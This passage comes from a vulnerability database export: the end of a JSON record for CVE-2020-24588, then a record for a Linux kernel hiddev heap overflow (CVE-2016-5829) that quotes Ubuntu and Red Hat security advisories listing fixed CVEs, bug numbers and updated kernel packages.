        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "date": "2022-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "date": "2021-06-23T15:35:21",
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "date": "2021-06-27T12:22:22",
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "date": "2021-06-28T16:22:26",
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "date": "2021-06-23T15:33:13",
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-11-10T17:04:39",
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-05-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "date": "2021-05-11T20:15:08.613000",
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "date": "2024-02-27T02:33:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "date": "2023-04-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "date": "2023-04-01T22:15:08.467000",
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IEEE\u00a0802.11\u00a0 Vulnerabilities related to lack of certification for critical functions in standards",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "encryption problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      }
    ],
    "trust": 0.6
  }
}

var-201606-0329
Vulnerability from variot

Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel through 4.6.3 allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call. The Linux kernel is prone to a local heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Local attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the kernel, denying service to legitimate users. ========================================================================== Ubuntu Security Notice USN-3070-4 August 30, 2016

linux-lts-xenial vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in the kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.

A missing permission check when settings ACLs was discovered in nfsd. A local user could exploit this flaw to gain access to any file by setting an ACL. (CVE-2016-1237)

Kangjie Lu discovered an information leak in the Reliable Datagram Sockets (RDS) implementation in the Linux kernel. A local attacker could use this to obtain potentially sensitive information from kernel memory. (CVE-2016-5244)

James Patrick-Evans discovered that the airspy USB device driver in the Linux kernel did not properly handle certain error conditions. (CVE-2016-5400)

Yue Cao et al discovered a flaw in the TCP implementation's handling of challenge acks in the Linux kernel. A remote attacker could use this to cause a denial of service (reset connection) or inject content into an TCP stream. (CVE-2016-5696)

Pengfei Wang discovered a race condition in the MIC VOP driver in the Linux kernel. (CVE-2016-5728)

Cyril Bur discovered that on PowerPC platforms, the Linux kernel mishandled transactional memory state on exec(). (CVE-2016-5828)

It was discovered that a heap based buffer overflow existed in the USB HID driver in the Linux kernel. (CVE-2016-5829)

It was discovered that the OverlayFS implementation in the Linux kernel did not properly verify dentry state before proceeding with unlink and rename operations. (CVE-2016-6197)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: linux-image-4.4.0-36-generic 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-generic-lpae 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-lowlatency 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-powerpc-e500mc 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-powerpc-smp 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-powerpc64-emb 4.4.0-36.55~14.04.1 linux-image-4.4.0-36-powerpc64-smp 4.4.0-36.55~14.04.1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2016:2574-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2574.html Issue date: 2016-11-03 CVE Names: CVE-2013-4312 CVE-2015-8374 CVE-2015-8543 CVE-2015-8746 CVE-2015-8812 CVE-2015-8844 CVE-2015-8845 CVE-2015-8956 CVE-2016-2053 CVE-2016-2069 CVE-2016-2117 CVE-2016-2384 CVE-2016-2847 CVE-2016-3070 CVE-2016-3156 CVE-2016-3699 CVE-2016-3841 CVE-2016-4569 CVE-2016-4578 CVE-2016-4581 CVE-2016-4794 CVE-2016-5412 CVE-2016-5828 CVE-2016-5829 CVE-2016-6136 CVE-2016-6198 CVE-2016-6327 CVE-2016-6480 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for Containers (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • It was found that the Linux kernel's IPv6 implementation mishandled socket options. A local attacker could abuse concurrent access to the socket options to escalate their privileges, or cause a denial of service (use-after-free and system crash) via a crafted sendmsg system call. (CVE-2016-3841, Important)

  • Several Moderate and Low impact security issues were found in the Linux kernel. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-4312, CVE-2015-8374, CVE-2015-8543, CVE-2015-8812, CVE-2015-8844, CVE-2015-8845, CVE-2016-2053, CVE-2016-2069, CVE-2016-2847, CVE-2016-3156, CVE-2016-4581, CVE-2016-4794, CVE-2016-5412, CVE-2016-5828, CVE-2016-5829, CVE-2016-6136, CVE-2016-6198, CVE-2016-6327, CVE-2016-6480, CVE-2015-8746, CVE-2015-8956, CVE-2016-2117, CVE-2016-2384, CVE-2016-3070, CVE-2016-3699, CVE-2016-4569, CVE-2016-4578)

Red Hat would like to thank Philip Pettersson (Samsung) for reporting CVE-2016-2053; Tetsuo Handa for reporting CVE-2016-2847; the Virtuozzo kernel team and Solar Designer (Openwall) for reporting CVE-2016-3156; Justin Yackoski (Cryptonite) for reporting CVE-2016-2117; and Linn Crosetto (HP) for reporting CVE-2016-3699. The CVE-2015-8812 issue was discovered by Venkatesh Pottem (Red Hat Engineering); the CVE-2015-8844 and CVE-2015-8845 issues were discovered by Miroslav Vadkerti (Red Hat Engineering); the CVE-2016-4581 issue was discovered by Eric W. Biederman (Red Hat); the CVE-2016-6198 issue was discovered by CAI Qian (Red Hat); and the CVE-2016-3070 issue was discovered by Jan Stancek (Red Hat).

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1141249 - Xen guests may hang after migration or suspend/resume 1234586 - Backtrace after unclean shutdown with XFS v5 and project quotas 1267042 - XFS needs to better handle EIO and ENOSPC 1277863 - Test case failure: Screen - Resolution after no Screen Boot on Intel Valley View Gen7 [8086:0f31] 1278224 - panic in iscsi_target.c 1283341 - cannot mount RHEL7 NFS server with nfsvers=4.1,sec=krb5 but nfsvers=4.0,sec=krb5 works 1286261 - CVE-2015-8374 kernel: Information leak when truncating of compressed/inlined extents on BTRFS 1286500 - Tool thin_dump failing to show 'mappings' 1290475 - CVE-2015-8543 kernel: IPv6 connect causes DoS via NULL pointer dereference 1292481 - device mapper hung tasks on an openshift/docker system 1295802 - CVE-2015-8746 kernel: when NFSv4 migration is executed, kernel oops occurs at NFS client 1297813 - CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted 1299662 - VFIO: include no-IOMMU mode - not supported 1300023 - soft lockup in nfs4_put_stid with 3.10.0-327.4.4.el7 1300237 - CVE-2016-2053 kernel: Kernel panic and system lockup by triggering BUG_ON() in public_key_verify_signature() 1301893 - CVE-2016-2069 kernel: race condition in the TLB flush logic 1302166 - MAC address of VF is not editable even when attached to host 1303532 - CVE-2015-8812 kernel: CXGB3: Logic bug in return code handling prematurely frees key structures causing Use after free or kernel panic. 1305118 - XFS support for deferred dio completion 1307091 - fstrim failing on mdadm raid 5 device 1308444 - CVE-2016-2384 kernel: double-free in usb-audio triggered by invalid USB descriptor 1308846 - CVE-2016-3070 kernel: Null pointer dereference in trace_writeback_dirty_page() 1312298 - CVE-2016-2117 kernel: Kernel memory leakage to ethernet frames due to buffer overflow in ethernet drivers 1313428 - CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes 1318172 - CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface 1321096 - BUG: s390 socketcall() syscalls audited with wrong value in field a0 1326540 - CVE-2015-8845 CVE-2015-8844 kernel: incorrect restoration of machine specific registers from userspace 1329653 - CVE-2016-3699 kernel: ACPI table override allowed when securelevel is enabled 1333712 - CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt 1334643 - CVE-2016-4569 kernel: Information leak in Linux sound module in timer.c 1335215 - CVE-2016-4578 kernel: Information leak in events in timer.c 1335889 - CVE-2016-4794 kernel: Use after free in array_map_alloc 1349539 - T460[p/s] audio output on dock won't work 1349916 - CVE-2016-5412 Kernel: powerpc: kvm: Infinite loop via H_CEDE hypercall when running under hypervisor-mode 1349917 - CVE-2016-5828 Kernel: powerpc: tm: crash via exec system call on PPC 1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver 1353533 - CVE-2016-6136 kernel: Race condition vulnerability in execve argv arguments 1354525 - CVE-2016-6327 kernel: infiniband: Kernel crash by sending ABORT_TASK command 1355654 - CVE-2016-6198 kernel: vfs: missing detection of hardlinks in vfs_rename() on overlayfs 1361245 - [Hyper-V][RHEL 7.2] VMs panic when configured with Dynamic Memory as opposed to Static Memory 1362466 - CVE-2016-6480 kernel: scsi: aacraid: double fetch in ioctl_send_fib() 1364971 - CVE-2016-3841 kernel: use-after-free via crafted IPV6 sendmsg for raw / tcp / udp / l2tp sockets. 1383395 - CVE-2015-8956 kernel: NULL dereference in RFCOMM bind callback

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-514.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.el7.noarch.rpm kernel-doc-3.10.0-514.el7.noarch.rpm

x86_64: kernel-3.10.0-514.el7.x86_64.rpm kernel-debug-3.10.0-514.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-devel-3.10.0-514.el7.x86_64.rpm kernel-headers-3.10.0-514.el7.x86_64.rpm kernel-tools-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.el7.x86_64.rpm perf-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-514.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.el7.noarch.rpm kernel-doc-3.10.0-514.el7.noarch.rpm

x86_64: kernel-3.10.0-514.el7.x86_64.rpm kernel-debug-3.10.0-514.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-devel-3.10.0-514.el7.x86_64.rpm kernel-headers-3.10.0-514.el7.x86_64.rpm kernel-tools-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.el7.x86_64.rpm perf-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux for Containers (v. 7):

Source: kernel-3.10.0-508.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-508.el7.noarch.rpm kernel-doc-3.10.0-508.el7.noarch.rpm

ppc64: kernel-3.10.0-508.el7.ppc64.rpm kernel-bootwrapper-3.10.0-508.el7.ppc64.rpm kernel-debug-3.10.0-508.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-508.el7.ppc64.rpm kernel-debug-devel-3.10.0-508.el7.ppc64.rpm kernel-debuginfo-3.10.0-508.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-508.el7.ppc64.rpm kernel-devel-3.10.0-508.el7.ppc64.rpm kernel-headers-3.10.0-508.el7.ppc64.rpm kernel-tools-3.10.0-508.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-508.el7.ppc64.rpm kernel-tools-libs-3.10.0-508.el7.ppc64.rpm perf-3.10.0-508.el7.ppc64.rpm perf-debuginfo-3.10.0-508.el7.ppc64.rpm python-perf-3.10.0-508.el7.ppc64.rpm python-perf-debuginfo-3.10.0-508.el7.ppc64.rpm

ppc64le: kernel-3.10.0-508.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-508.el7.ppc64le.rpm kernel-debug-3.10.0-508.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-508.el7.ppc64le.rpm kernel-debuginfo-3.10.0-508.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-508.el7.ppc64le.rpm kernel-devel-3.10.0-508.el7.ppc64le.rpm kernel-headers-3.10.0-508.el7.ppc64le.rpm kernel-tools-3.10.0-508.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-508.el7.ppc64le.rpm kernel-tools-libs-3.10.0-508.el7.ppc64le.rpm perf-3.10.0-508.el7.ppc64le.rpm perf-debuginfo-3.10.0-508.el7.ppc64le.rpm python-perf-3.10.0-508.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-508.el7.ppc64le.rpm

s390x: kernel-3.10.0-508.el7.s390x.rpm kernel-debug-3.10.0-508.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-508.el7.s390x.rpm kernel-debug-devel-3.10.0-508.el7.s390x.rpm kernel-debuginfo-3.10.0-508.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-508.el7.s390x.rpm kernel-devel-3.10.0-508.el7.s390x.rpm kernel-headers-3.10.0-508.el7.s390x.rpm kernel-kdump-3.10.0-508.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-508.el7.s390x.rpm kernel-kdump-devel-3.10.0-508.el7.s390x.rpm perf-3.10.0-508.el7.s390x.rpm perf-debuginfo-3.10.0-508.el7.s390x.rpm python-perf-3.10.0-508.el7.s390x.rpm python-perf-debuginfo-3.10.0-508.el7.s390x.rpm

x86_64: kernel-3.10.0-508.el7.x86_64.rpm kernel-debug-3.10.0-508.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-508.el7.x86_64.rpm kernel-debuginfo-3.10.0-508.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-508.el7.x86_64.rpm kernel-devel-3.10.0-508.el7.x86_64.rpm kernel-headers-3.10.0-508.el7.x86_64.rpm kernel-tools-3.10.0-508.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-508.el7.x86_64.rpm kernel-tools-libs-3.10.0-508.el7.x86_64.rpm perf-3.10.0-508.el7.x86_64.rpm perf-debuginfo-3.10.0-508.el7.x86_64.rpm python-perf-3.10.0-508.el7.x86_64.rpm python-perf-debuginfo-3.10.0-508.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-514.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.el7.noarch.rpm kernel-doc-3.10.0-514.el7.noarch.rpm

ppc64: kernel-3.10.0-514.el7.ppc64.rpm kernel-bootwrapper-3.10.0-514.el7.ppc64.rpm kernel-debug-3.10.0-514.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-debug-devel-3.10.0-514.el7.ppc64.rpm kernel-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-514.el7.ppc64.rpm kernel-devel-3.10.0-514.el7.ppc64.rpm kernel-headers-3.10.0-514.el7.ppc64.rpm kernel-tools-3.10.0-514.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-tools-libs-3.10.0-514.el7.ppc64.rpm perf-3.10.0-514.el7.ppc64.rpm perf-debuginfo-3.10.0-514.el7.ppc64.rpm python-perf-3.10.0-514.el7.ppc64.rpm python-perf-debuginfo-3.10.0-514.el7.ppc64.rpm

ppc64le: kernel-3.10.0-514.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-514.el7.ppc64le.rpm kernel-debug-3.10.0-514.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-514.el7.ppc64le.rpm kernel-devel-3.10.0-514.el7.ppc64le.rpm kernel-headers-3.10.0-514.el7.ppc64le.rpm kernel-tools-3.10.0-514.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-tools-libs-3.10.0-514.el7.ppc64le.rpm perf-3.10.0-514.el7.ppc64le.rpm perf-debuginfo-3.10.0-514.el7.ppc64le.rpm python-perf-3.10.0-514.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-514.el7.ppc64le.rpm

s390x: kernel-3.10.0-514.el7.s390x.rpm kernel-debug-3.10.0-514.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-514.el7.s390x.rpm kernel-debug-devel-3.10.0-514.el7.s390x.rpm kernel-debuginfo-3.10.0-514.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-514.el7.s390x.rpm kernel-devel-3.10.0-514.el7.s390x.rpm kernel-headers-3.10.0-514.el7.s390x.rpm kernel-kdump-3.10.0-514.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-514.el7.s390x.rpm kernel-kdump-devel-3.10.0-514.el7.s390x.rpm perf-3.10.0-514.el7.s390x.rpm perf-debuginfo-3.10.0-514.el7.s390x.rpm python-perf-3.10.0-514.el7.s390x.rpm python-perf-debuginfo-3.10.0-514.el7.s390x.rpm

x86_64: kernel-3.10.0-514.el7.x86_64.rpm kernel-debug-3.10.0-514.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-devel-3.10.0-514.el7.x86_64.rpm kernel-headers-3.10.0-514.el7.x86_64.rpm kernel-tools-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.el7.x86_64.rpm perf-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: kernel-debug-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-514.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-514.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-514.el7.ppc64.rpm perf-debuginfo-3.10.0-514.el7.ppc64.rpm python-perf-debuginfo-3.10.0-514.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-debug-devel-3.10.0-514.el7.ppc64le.rpm kernel-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-514.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-514.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-514.el7.ppc64le.rpm perf-debuginfo-3.10.0-514.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-514.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-514.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.el7.noarch.rpm kernel-doc-3.10.0-514.el7.noarch.rpm

x86_64: kernel-3.10.0-514.el7.x86_64.rpm kernel-debug-3.10.0-514.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-devel-3.10.0-514.el7.x86_64.rpm kernel-headers-3.10.0-514.el7.x86_64.rpm kernel-tools-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.el7.x86_64.rpm perf-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

